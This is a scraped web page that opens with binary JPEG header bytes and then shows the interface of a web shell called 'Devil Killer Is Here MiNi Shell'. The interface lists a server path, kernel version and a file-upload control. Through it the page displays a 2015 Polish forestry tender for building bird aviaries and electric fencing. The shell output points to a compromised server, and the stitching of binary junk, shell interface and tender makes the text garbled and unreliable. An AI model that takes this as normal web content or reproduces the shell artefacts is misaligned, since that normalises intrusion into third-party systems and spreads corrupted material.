JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150720/107533-N-2015.html

<p class="kh_header"><b>Ruszów: Przygotowanie powierzchni adaptacyjnej wraz z budową wolier adaptacyjnych oraz demontaż części urządzeń, zbudowanych na tej powierzchni po okresie adaptacji ptaków</b><br>
<b>Numer ogłoszenia: 107533 - 2015; data zamieszczenia: 20.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Ruszów , ul. Leśna 2, 59-950 Ruszów, woj. dolnośląskie, tel. 75 7714339, faks 75 7714468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ruszow.wroclaw.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie powierzchni adaptacyjnej wraz z budową wolier adaptacyjnych oraz demontaż części urządzeń, zbudowanych na tej powierzchni po okresie adaptacji ptaków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie na powierzchni adaptacyjnej następujących czynności:
1. Wybudowanie:
    1) 10 siatkowych wolier adaptacyjnych o powierzchni ok. 80 m2 każda;
    2) 2 wolier (izolatki)  o powierzchni  ok. 3 m2 każda.
    Usługa obejmuje również takie czynności jak: wykonanie małych zadaszeń nad wykładaną karmą, 
    wysypanie niewielkich ilości żwiru i piasku w wybudowanych wolierach, wykonanie i ustawienie 
    w wolierach stanowisk noclegowych dla wsiedlanych ptaków (grzędy, pniaczki), wysypanie
    piaskiem miejsc, w których ustawione będą daszki (około 2 m2 pod każdym).
    Usługa obejmuje ponadto wszystkie koszty zakupu siatki do ogrodzenia wolier, siatki na woliery,
    słupków, desek, wkrętów i zawiasów oraz montaż w terenie (na powierzchni adaptacyjnej,
    znajdującej się na terenie Nadleśnictwa Ruszów), wszystkich urządzeń, według wskazań
    Zamawiającego.
    Opis techniczny i parametry budowli i urządzeń:
    1. Siatkowe woliery adaptacyjne - 10 sztuk o powierzchni ok. 80 m2 każda.
       Każda woliera zbudowana z 10 przęseł o wymiarach 250 cm x 100 cm; woliery ustawione
       parami z jedną wspólną ścianą, zbudowaną z dwóch przęseł. Łącznie jedna para wolier składa
       się z 18 przęseł.
      1) każde przęsło zbudowane z 4 niestruganych desek z drewna iglastego o wymiarach 
            240 cm x 10 cm  x 2,5 cm oraz 4 niestruganych desek z drewna iglastego o wymiarach 
            90 cm x 10 cm x 2,5 cm połączonych wkrętami do drewna z wmontowaną w środek przęsła
            siatką heksagonalną;
       2) siatka: heksagonalna, pleciona o wymiarach 1,0 - 1,3 cm x 0,07 cm o wysokości 100 cm,
            ocynkowana i powlekana w kolorze zielonym;
       3) wejście do każdej woliery o wymiarach 60 cm x 130 cm zbudowane w sposób i z materiałów
          określonych w pkt. 1) i 2), na zawiasach metalowych z drewnianym zamknięciem od strony
          wewnętrznej  i zewnętrznej;
       4) przęsła połączone dla ustabilizowania konstrukcji dębowymi słupkami przekroju
           kwadratowym 8 x 8 cm,  o długości 150 cm w ilości 11 sztuk oraz o długości 200 cm w ilości 
          2 szt., zakotwiczonymi poprzez ich wbicie w grunt;
       5) każda woliera przedzielona ścianką z desek z drewna iglastego, jednostronnie struganych, 
            grubości min 12 mm, łączonych na pióro - wpust, o długości 4 mb i wysokości 1 metr. 
           W połowie długości ścianki, dodatkowo zamontowane na 2 metalowych zawiasach, drewniane 
           drzwiczki o wymiarach - szerokość 60 cm, wysokość 100 cm, dodatkowo przytwierdzone 
           do 2 drewnianych, dębowych słupków, osadzonych w gruncie, o długości 150 cm i przekroju 
           8 cm x 8 cm. W dolnej części drzwiczek wykonany otwór o wymiarach 40 cm x 40 cm,  
           zamykany i otwierany zasuwą (o wymiarach 45 cm x 45 cm) przy pomocy izolowanej linki 
           stalowej, uruchamianej z zewnątrz woliery.
    6) w każdej wolierze przejście pomiędzy wolierami, zbudowane z drewna iglastego, o wymiarach
        16 cm x 16 cm zamykane i otwierane zasuwą (o wymiarach 20 cm x 20 cm.) przy pomocy
        izolowanej linki stalowej, uruchamianej z zewnątrz woliery;
    7) drewno zastosowane przy budowie wolier - impregnowane w kolorze zielonym lub brązowym, 
        impregnatem posiadającym atest;
    8) każda woliera zabudowana od góry siatką przykrywającą (siatka na woliery dla ptaków) 
        z polipropylenu w kolorze  czarnym o oczku maksymalnie do 2,5 cm x 2,5 cm. Siatka
        przykrywająca, przytwierdzona do boków przęseł, za pomocą gwoździ lub wkrętów.
        Przewidywana ilość siatki maskującej  na jedną wolierę - ok. 100 m2.
    9) do wykończenia każdej woliery niezbędne jest wkopanie wzdłuż dłuższego boku desek 
        z drewna iglastego - 11 sztuk o wymiarach 250 cm x 10 cm x 2,5 cm, 2 sztuki  o wymiarach
        60 cm  x 10 cm x 2,5 cm oraz ułożenie wokół woliery 11 desek o wymiarach 250 cm x 15 - 20
         cm x 2,5 cm, 1 deski 60 cm x 20 cm x 2,5 cm;
    10) wykonanie 25 sztuk zadaszeń nad miejscami dokarmiania: daszek skośny o powierzchni 
        1,20 m2 i wymiarach  100 cm x 120 cm z desek z drewna iglastego, jednostronnie struganych, 
        impregnowanych, o grubości nie mniejszej, niż 12 mm, pokrytych papą, zamontowanych 
        na konstrukcji, zbudowanej z krawędziaków o wymiarach:
        a) 4 cm x 3 cm x120 cm  -  6 sztuk
        b) 4 cm x 3 cm x 80 cm  -  6 sztuk
        c) 4 cm x 3 cm x 40 cm  -  2 sztuki
        d) 4 cm x 3 cm x 48 cm  -  2 sztuki
    11) zamontowanie na łącznie około  300 izolatorach na słupkach drewnianych oraz na przęsłach,
        w trzech rzędach, na wysokości, według wskazań Zamawiającego, łącznie na wszystkich 
        siatkowych wolierach adaptacyjnych, standardowego przewodu elektryzatora, o łącznej długości 
        około 800 mb.
2. Woliery (izolatki) - 2 sztuki o powierzchni około 3 m2 każda.
    1) każda woliera zbudowana z 3 przęseł o wymiarach jak w pozycji 1.1), 1.2), 1.3),  1.7). 
    2) przęsła połączone dla ustabilizowania konstrukcji słupkami dębowymi o przekroju 
        8 cm  x 8 cm, o długości 150 cm w ilości 4 sztuk i o długości 200 cm w ilości 4 sztuk;
    3) każda woliera zabudowana od góry siatką na woliery dla ptaków z polipropylenu w kolorze
        czarnym o oczku maksymalnie do 2,5 cm x 2,5 cm. Siatka zamontowana na bokach przęseł. 
        Przewidywana ilość siatki na jedną wolierę - około 5 m2;
    4) każda woliera dodatkowo zabudowana od góry drewnianym dachem o wymiarach woliery + 20
        cm. Deski z drewna iglastego, łączone na pióro - wpust o grubości nie mniejszej niż 12 mm,
        pokryte papą;
    5) w każdej wolierze jest również do wykonania podłoga drewniana o wymiarach 1,00 mb (średnia
        szerokość podłogi) x 2,00 mb i dwie ścianki boczne o wymiarach 100 cm x 200 cm. Podłoga 
        z desek z drewna iglastego, łączonych na styk o grubości min. 25 mm na 3 legarkach 
        o wymiarach 40 mm x 60 mm.  Ścianki boczne zbudowane z desek z drewna iglastego, 
        łączonych na pióro - wpust o grubości min. 12 mm;
    6) do wykończenia każdej woliery niezbędne jest wkopanie wzdłuż dłuższego boku desek 
        z drewna iglastego: 3 sztuki o wymiarach 250 cm x 10 cm x 2,5 cm, 1 deski o wymiarach
        60 cm x 10 cm x 2,5 cm oraz ułożenie wokół woliery 3 desek o wymiarach 250 cm x 15 - 20 cm 
        x 2,5 cm, 1 deski  o wymiarach 60 cm x 20 cm x 2,5 cm;
    7) zamontowanie na łącznie około 40 izolatorach do słupków drewnianych,  w trzech rzędach, 
        na wysokości, według wskazań Zamawiającego, standardowego przewodu elektryzatora, 
        o łącznej długości około 70 mb. 
    Wszystkie materiały niezbędne do wykonania powyższych czynności stanowią koszt własny
    Wykonawcy i powinny być ujęte w proponowanej wartości usługi w formularzu ofertowym.
    Usługa obejmuje ponadto wszystkie koszty zakupu siatki do ogrodzenia wolier, siatki 
    przykrywającej, słupków, desek, wkrętów i zawiasów oraz montaż w terenie, wg wskazań 
    Zamawiającego.
    Elektryzatory i odstraszacze ultradźwiękowe nie stanowią kosztów ponoszonych przez 
    Wykonawcę, gdyż zostaną przekazane Wykonawcy przez Zamawiającego w celu ich 
    zainstalowania. 
    Wszystkie izolatory, standardowy przewód elektryzatora stanowią koszt Wykonawcy.
2. Wybudowanie:
    1) ogrodzenia o długości 700 mb, stanowiącego zabezpieczenie powierzchni ok. 4 ha, składającego
        się z elektryzatora i fladr, umocowanych na dębowych słupkach o przekroju kwadratowym 
        (8 cm x 8 cm i długości 150 cm), usytuowanych w odległości 4 mb od siebie oraz wyłożenie 
        pod linią elektryzatora agrowłókniny i jej obustronne zakotwiczenie w gruncie (odległość
        kotwiczenia - do 1 mb);
    2) ogrodzenia o długości 1650 mb, stanowiącego zabezpieczenie powierzchni ok. 12 ha, 
        składającego się z fladr, umocowanych na dębowych słupkach o przekroju kwadratowym
        (8 cm x 8 cm i długości 150 cm), usytuowanych w odległości 4 mb od siebie;
    3) wykonanie i rozwieszenie na słupkach obu ogrodzeń 2350 mb fladr;
    4) odrębnej linii zasilającej, o długości około 250 mb do wolier oraz do 100 mb pomiędzy
        wolierami (kabel zasilający należy wkalkulować w koszty wykonania usługi);
    5) drewnianego pomieszczenia na akumulator i elektryzatory.
    Usługa obejmuje również takie czynności jak: wykoszenie powierzchni pod linią elektryzatora, 
    oraz uprzątnięcie zalegającego w miejscach budowy urządzeń pozostałości po koszeniu 
    i ewentualnie zalegających gałęzi.
   Opis techniczny i parametry budowli i urządzeń:
    Ad 2.1) i 2.3) 
    Ogrodzenie o długości 700 mb, stanowiące zabezpieczenie powierzchni ok. 4 ha.
    W ramach tej części zadania należy na drewnianych, dębowych kołkach, osadzonych,
    na głębokość, wskazaną przez Zamawiającego, zainstalować, na wskazanej, przez Zamawiającego 
    wysokości, elektryczny płot, składający się z dwóch rzędów linii elektryzatora, na około 
    350 standardowych izolatorach do słupków drewnianych. Łączna długość standardowego 
    przewodu elektryzatora - około 1 400 mb.
    W ramach tego samego zadania należy przytwierdzić do drewnianych kołków wokół ogrodzenia, 
    za pomocą gwoździ lub zszywek metalowych i dodatkowo zacisnąć plastikowymi opaskami 
    zaciskowymi, stosownej długości, wykonane wcześnie fladry oraz przytwierdzić do gruntu, 
    pod linią elektryzatora agrowłókninę. Kotwiczenie agrowłókniny - jak w pkt 2.1).
    Ad. 2.2):
    W ramach tego samego zadania należy do drewnianych kołków, wbitych w grunt, na głębokość 
    wskazaną przez Zamawiającego w odstępie co około 4 metry, przytwierdzić wokół ogrodzenia, 
    za pomocą gwoździ lub zszywek metalowych i dodatkowo zacisnąć plastikowymi opaskami 
    zaciskowymi, stosownej długości, wykonane wcześnie fladry.
    Parametry fladr:
    Tkanina na paski fladr - odporna na zmienne warunki atmosferyczne (deszcz, śnieg, mróz, słońce), 
    z gwarancją zachowania trwałości przez okres minimum 3 lat.
    Paski tkaniny, w kolorach: czerwony, szary, żółty, zielony (do wyboru i zastosowania - minimum 
    2 kolory), o długości około 45 cm i szerokości około 10 cm, przyszyte na całej szerokości tkaniny, 
    nicią odporną na zmienne warunki atmosferyczne, w odstępach co około 50 cm, do taśmy nośnej 
    z polipropylenu, w kolorze czarnym (typu TN 025C), o szerokości minimum  25 mm.
    Parametry agrowłókniny i kotew:
    Agrowłóknina czarna o parametrach nie mniejszych, niż 50g/m2 - z filtrem UV, Szerokość
    montowanej agrowłókniny - 80 cm.
    Szpilki kotwice do mocowania agrowłókniny - długość minimalna 14,5 cm, średnica główki, 
    nie mniej niż 0,38 cm.
    Ad. 2.4):
    Wybudowanie odrębnych linii zasilających do wolier i ogrodzenia części powierzchni 
    adaptacyjnej, bezpośrednio przyległej do wolier, polega na ułożeniu i lekkim przysypaniu 
    rodzimym gruntem przewodu elektrycznego typu OWY 300/500VH05VV-F 2 x 0,75, w kolorze
    czarnym, na odcinkach łączących miejsce, z usytuowanym  źródłem zasilania, a wybudowanymi 
    wcześniej wolierami (wszystkimi) i  ogrodzeniem części powierzchni adaptacyjnej, bezpośrednio
    przyległej do wolier.
    Wykonawca jest zobowiązany do zamontowania łącznie 32 sztuki uchwytów izolowanych                          
    ze sprężyną, w miejscach, wskazanych przez Zamawiającego. Uchwyty stanowią koszt 
    Wykonawcy.
    Ad 2.5):
    Drewniane pomieszczenie na akumulator i elektryzatory - parametry:
    Wymiary: długość - 80 cm; szerokość - 80 cm; wysokość - 40 cm.
    Materiały: deski sosnowe lub świerkowe o grubości 25 mm i szerokości do 12 cm,                                                    
    jednostronnie strugane, łączone na pióro-wpust. Skrzynia, wewnętrznie przedzielona w pionie 
    deskami na 2 pomieszczenia, prostopadle do szerokości skrzyni.
    Szerokość uzyskanych w ten sposób pomieszczeń:
    - pomieszczenie nr 1 - minimum 40 cm, 
    - pomieszczenie nr 2 - minimum 20 cm. 
    Dodatkowo wszystkie zewnętrzne ściany docieplone materiałem typu styropian o grubości nie
    mniejszej niż 5 cm.
    Pomieszczenie zadaszone daszkiem skośnym, lub dwuspadowym, o wymiarach minimum 10 cm 
    większych niż długość i szerokość pomieszczenia.
    Dach przykryty gontem papowym w kolorze - odcienie szarości.  
    Wybudowane pomieszczenie należy umieścić na drewnianej palecie typu EURO, o wymiarach nie 
    mniejszych, niż 100 cm x 80 cm.
    Drewno zastosowane przy budowie pomieszczenia na akumulator - impregnowane w kolorze 
    zielonym lub brązowym, impregnatem posiadającym atest.
    Wszystkie materiały niezbędne do wykonania powyższych czynności stanowią koszt własny 
    Wykonawcy i powinny być ujęte w proponowanej wartości usługi w formularzu ofertowym
3. Przygotowanie i ustawienie obozowiska dla przebywających w pobliżu powierzchni 
    adaptacyjnej osób. 
    Usługa polega na dowiezieniu z siedziby Zamawiającego, rozłożeniu, ustawieniu i zakotwiczeniu
    w gruncie wszystkich niezbędnych, dla prawidłowego funkcjonowania obozowiska, 
    zlokalizowanego w pobliżu powierzchni adaptacyjnej, urządzeń, przedmiotów i materiałów, 
    będących własnością Zamawiającego, a przekazanych do użytkowania przez pracowników 
    Wykonawcy.
    Usługa obejmuje m. in.:
    1) zaholowanie przyczepy kempingowej oraz jej zakotwiczenie wraz z przykryciem siatką
        maskującą;
    2) dowiezienie i ustawienie w terenie minimum 2 namiotów magazynowych;
    3) dowiezienie i ustawienie minimum 2 ławek drewnianych wraz z 6 krzesłami;
    4) dowiezienie: 10 beczek o pojemności 50 - 70 litrów, niezbędnej ilości wiader, pojemników, 
        dowiezienie pojemnika na wodę o pojemności 1000 litrów i innych niezbędnych przedmiotów.
4. Demontaż powierzchni adaptacyjnej po okresie adaptacji, w terminie i według wskazań 
    Zamawiającego.
    Usługa obejmuje demontaż i przetransportowanie do siedziby Zamawiającego, wszystkich
    wskazanych przez Zamawiającego urządzeń, przedmiotów i obiektów, znajdujących się 
    na powierzchni adaptacyjnej.
 5.Usługa obejmuje również takie czynności jak: wykoszenie powierzchni pod linią elektryzatora, 
    oraz uprzątnięcie zalegającego w miejscach budowy urządzeń pozostałości po koszeniu 
    i ewentualnie zalegających gałęzi..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiotem zamówień uzupełniających będzie powtórzenie przedmiotu zamówienia podstawowego o wartości nie przekraczającej 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 1 700,00 złotych (słownie: jeden tysiąc 
    siedemset złotych)
2. Wadium musi zostać wniesione przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy
        dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
        z 2007 r. Nr 42 poz. 275 ze zmianami).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego: PKO BP S.A. Bolesławiec  Nr  51 1020 2137 0000 9202 0101 5841  
    z dopiskiem: Wadium - N.270.12.2015.KRPL - Przygotowanie powierzchni.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy
    oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej oraz w formie
    poręczenia udzielonego przez podmioty, o których mowa w pkt. 3.5, należy złożyć w formie 
    oryginału w siedzibie Zamawiającego (sekretariat - pokój nr 20), a kopię załączyć do oferty.
7. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta
    została wybrana jako najkorzystniejsza.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu
    zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę
    przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono
    wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako
    najkorzystniejsza. Wykonawca zobowiązany jest do wniesienia wadium w terminie określonym
    przez  Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi
    z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty
    prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek 
    bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została
     wybrana:
     1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
        w ofercie;
     2) nie wniósł wymaganego zabezpieczenia należytego wykonania przedmiotu umowy;
     3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
         po stronie Wykonawcy.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, który w określonym
    terminie nie złożył wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których
    mowa w pkt. XI SIWZ lub pełnomocnictw, i w odpowiedzi na wezwanie Zamawiającego nie
    złoży ich w wyznaczonym terminie, chyba że udowodni, że wynika to z przyczyn nie leżących
    po jego stronie.
14. W przypadku wniesienia wadium w walucie innej niż PLN, przeliczenie wartości wadium  
    na PLN nastąpi  wg średniego kursu NBP z dnia publikacji ogłoszenia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykonywał usługi podobne do przedmiotu zamówienia, w tym również usługi z zakresu gospodarki leśnej na terenie objętym
    dyrektywą 2009/147/WE z 30 listopada 2009 w sprawie ochrony dzikiego ptactwa (dyrektywa 
    ptasia).
W celu potwierdzenia spełnienia warunku udziału w postępowaniu Wykonawca zobowiązany jest do złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował osobami posiadającymi niezbędną wiedzę i  doświadczenie, umożliwiającymi należyte
    wykonanie przedmiotu zamówienia
W celu potwierdzenia spełnienia warunku udziału w postępowaniu Wykonawca zobowiązany jest do złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, 
    że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej 
    działalności związanej z przedmiotem zamówienia o minimalnej wartości ubezpieczenia
    wynoszącej 60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

